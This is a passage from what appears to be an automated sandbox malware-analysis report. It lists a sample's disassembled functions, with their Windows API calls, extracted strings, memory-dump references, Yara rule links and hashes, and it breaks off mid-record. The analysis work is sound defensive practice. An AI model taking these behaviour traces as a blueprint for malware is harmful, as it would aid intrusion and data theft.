                            • Opcode ID: a56fee46e49404f7f551aea26e56d31bd90ff5fe8f70ee41d01f90b2640ebfc0
                            • Instruction ID: cad53b8e42b4fe4399f1088381507abe4683406e451bc6a26ac1e9b8c9277670
                            • Opcode Fuzzy Hash: a56fee46e49404f7f551aea26e56d31bd90ff5fe8f70ee41d01f90b2640ebfc0
                            • Instruction Fuzzy Hash: C5115170304B40CBC7218A2CE91072A77E1ABD2B62F250A5FE89187696D769D849C7A9
                            Function 00453CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0045A430,000000FF), ref: 00453D20
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00453D27
                            • wsprintfA.USER32 ref: 00453D37
                              • Part of subcall function 004571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004571FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: de2117036833f2fcc90ccf88bacbe350fdae0faf6ee09894f3d50ab6256d83a2
                            • Instruction ID: 6fc157d0916a85224c15ba73be6113a08582d5e2e09afe1a751031afc2297f75
                            • Opcode Fuzzy Hash: de2117036833f2fcc90ccf88bacbe350fdae0faf6ee09894f3d50ab6256d83a2
                            • Instruction Fuzzy Hash: 4601AD71644600BFE7205B649C0AF6ABB7DFB45B62F10021AFE05972D0DAF41900C6A6
                            Function 0045926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 00459279
                              • Part of subcall function 004587FF: __amsg_exit.LIBCMT ref: 0045880F
                            • __amsg_exit.LIBCMT ref: 00459299
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit$__getptd
                            • String ID: XuF$XuF
                            • API String ID: 441000147-2164418370
                            • Opcode ID: 054e5329693bbd4d8ac6dfd7ade7838813840e8aa53d1b0bfbb1b7ac1b9dbb72
                            • Instruction ID: ee2719aee3850ffa1c3d6cf265452440bfc8c555ad50f4530c3b99170d7f4a69
                            • Opcode Fuzzy Hash: 054e5329693bbd4d8ac6dfd7ade7838813840e8aa53d1b0bfbb1b7ac1b9dbb72
                            • Instruction Fuzzy Hash: B7016532909711FBD711BB69980575E73906F04B1AF18046FFC0067692DB6C6D4ACBDE
                            Function 00438710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00438737
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A188
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 74b349fd9a98aaa2c8a9addd3dfe214bf231211c60db4c86ceb1e82e7f08b8b6
                            • Instruction ID: d0ff995166c3d1c5fea7a364c36af1a3f79486832f461937dae4d4de7bf6f80e
                            • Opcode Fuzzy Hash: 74b349fd9a98aaa2c8a9addd3dfe214bf231211c60db4c86ceb1e82e7f08b8b6
                            • Instruction Fuzzy Hash: C0F09037B001211F8354643E8D8445FE94757E939073AE72AF81AEF359ED74EC8285D9
                            Function 004586D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0045781C: __mtinitlocknum.LIBCMT ref: 00457832
                              • Part of subcall function 0045781C: __amsg_exit.LIBCMT ref: 0045783E
                            • ___addlocaleref.LIBCMT ref: 00458756
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                            • String ID: KERNEL32.DLL$XuF$xtF
                            • API String ID: 3105635775-4132113681
                            • Opcode ID: 352a208bdc6ca3cfb6f7770c04082214013d7fbd044bff3bf33e78c35c1427b8
                            • Instruction ID: 505e91be1e22b0252284a13656f34d7df01cb35cb214148e89496ffa9b44c7a3
                            • Opcode Fuzzy Hash: 352a208bdc6ca3cfb6f7770c04082214013d7fbd044bff3bf33e78c35c1427b8
                            • Instruction Fuzzy Hash: 6401DF71444700DEE720AF76D805709F7E0AF50319F20895FE8D6676E2CFB8A548CB19
                            Function 0044E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044E544
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E573
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E581
                            • lstrcat.KERNEL32(?,00FFE290), ref: 0044E59C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: e14abcf4f2dcd40a1c63fbec6eade34415c38c316accf3a1230865fa46155e1c
                            • Instruction ID: 9f0f8fdd961b0061cec2c7a9f75340c01d2a7a8779251077ad70d7e0ac141852
                            • Opcode Fuzzy Hash: e14abcf4f2dcd40a1c63fbec6eade34415c38c316accf3a1230865fa46155e1c
                            • Instruction Fuzzy Hash: 3051D972A10208AFDB54EB65DC82EEE337DFB4C304F44159EF90587251DEB4AE448BA4
                            Function 00451FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00451FDF, 00451FF5, 004520B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: ebadeb12b4942de9ca8484b27f1a0b5c5df27c9ac6c81f8c2e63fc6447b5d55c
                            • Instruction ID: cb281b96b276f9a7590528c16d64c4267f1c8c12ac89eb1397a3a1c2f3668b19
                            • Opcode Fuzzy Hash: ebadeb12b4942de9ca8484b27f1a0b5c5df27c9ac6c81f8c2e63fc6447b5d55c
                            • Instruction Fuzzy Hash: 8A2125355111899BDB20AB35C5846EEB3A6DB81B63F844057CE180B2C3E3BA190ED79E
                            Function 0044EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044EBB4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044EBE3
                            • lstrcat.KERNEL32(?,00000000), ref: 0044EBF1
                            • lstrcat.KERNEL32(?,00FFF310), ref: 0044EC0C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: cd56d7f0dc3fa182a2cedb41915dd6eab1fc78deb693adc0d423e7d2a645ab3d
                            • Instruction ID: e062df2425d526ab77762be27f518eb8cbe242d2d4798082671e19ef003f2b2b
                            • Opcode Fuzzy Hash: cd56d7f0dc3fa182a2cedb41915dd6eab1fc78deb693adc0d423e7d2a645ab3d
                            • Instruction Fuzzy Hash: A231A671A10118ABDB25FB65DD41BEE73B9FF4C300F1014AEFA1697250DEB4AE448B94
                            Function 00454480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 00454492
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004544AD
                            • CloseHandle.KERNEL32(00000000), ref: 004544B4
                            • lstrcpy.KERNEL32(00000000,?), ref: 004544E7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: fd183211b3be301c8bf4295170737bfdad27e792e810dda00a7d69026af88793
                            • Instruction ID: 15b62748e235d09dad5871f881b6c47ef1364735f4e03e5282e49cc1d9e2f334
                            • Opcode Fuzzy Hash: fd183211b3be301c8bf4295170737bfdad27e792e810dda00a7d69026af88793
                            • Instruction Fuzzy Hash: 0FF028B09412152BE7209B709D08BEBB6ACAF45309F000195EE84DB281DAF48CC487A4
                            Function 00458FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 00458FDD
                              • Part of subcall function 004587FF: __amsg_exit.LIBCMT ref: 0045880F
                            • __getptd.LIBCMT ref: 00458FF4
                            • __amsg_exit.LIBCMT ref: 00459002
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00459026
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 7733955cc43c2dc843804d58a64178d946670a0961111f97d7d9e968a3486fbb
                            • Instruction ID: 82e70e36bea7a99a3b95e56a58c716d78897b10359c066bad21fd5863648aa5d
                            • Opcode Fuzzy Hash: 7733955cc43c2dc843804d58a64178d946670a0961111f97d7d9e968a3486fbb
                            • Instruction Fuzzy Hash: 3FF06232948610DAD660BB7A680675A23A16F04B1BF24451FFC44662D3DF6C5908DA5E
                            Function 00457310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(------,00435BEB), ref: 0045731B
                            • lstrcpy.KERNEL32(00000000), ref: 0045733F
                            • lstrcat.KERNEL32(?,------), ref: 00457349
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: 3ffda6a63688f296269f07fab111577cad5f789607f3f6586ca1cb3f08bf55cc
                            • Instruction ID: ec250612e04a2ec4bd95f41b61388001238ce540a9cb3bd1a7111fab2d181883
